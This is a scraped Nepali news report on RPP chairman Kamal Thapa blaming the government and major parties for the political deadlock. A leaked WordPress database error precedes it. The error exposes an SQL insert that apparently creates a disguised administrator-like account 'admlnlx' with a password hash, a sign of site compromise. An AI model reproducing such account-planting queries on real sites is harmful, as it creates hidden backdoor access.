WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BQ40nMrsfi1V2K89Zn18WO8TngP/Xt0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-07 12:29:08', '', 'admlnlx', 'admlnlx')
काठमाडौं,माघ २९ –
सत्तारुढ राष्ट्रिय प्रजातन्त्र पार्टीका अध्यक्ष कमल थापाले सरकारकै कारण राजनीतिक गतिरोध लम्बिएको आरोप लगाएका छन्। उनले सरकारको ध्यान राजनीतिक जतिरोध अन्त्य गर्नेतर्फ नरेहेको बताए।
प्रमुख दलहरुकै कारण देशमा समस्या सिर्जना भएको थापाले बताए। उनले निर्वाचन सम्बन्धी सबै विधेयकहरु संसदबाट पारित भइनसकेको स्थितिमा १० दिनसम्म संसद स्थगित गर्नु र स्थानीय तह पुनर्संरचना आयोगको प्रतिवेदन हेरफेर गराउन खोज्नुले सरकारको नियतमाथि शंका उत्पन्न भएको बताए। आफ्नो पार्टी सरकारमा भए पनि महत्वपूर्ण निर्णय गर्दा प्रमुख दलहरुले उपेक्षा गरेको गुनासो थापाले गरे। थापाले तत्काल निर्वाचनको मिति घोषणा नगरे नयाँ संविधान नै खतरामा पर्न बताए।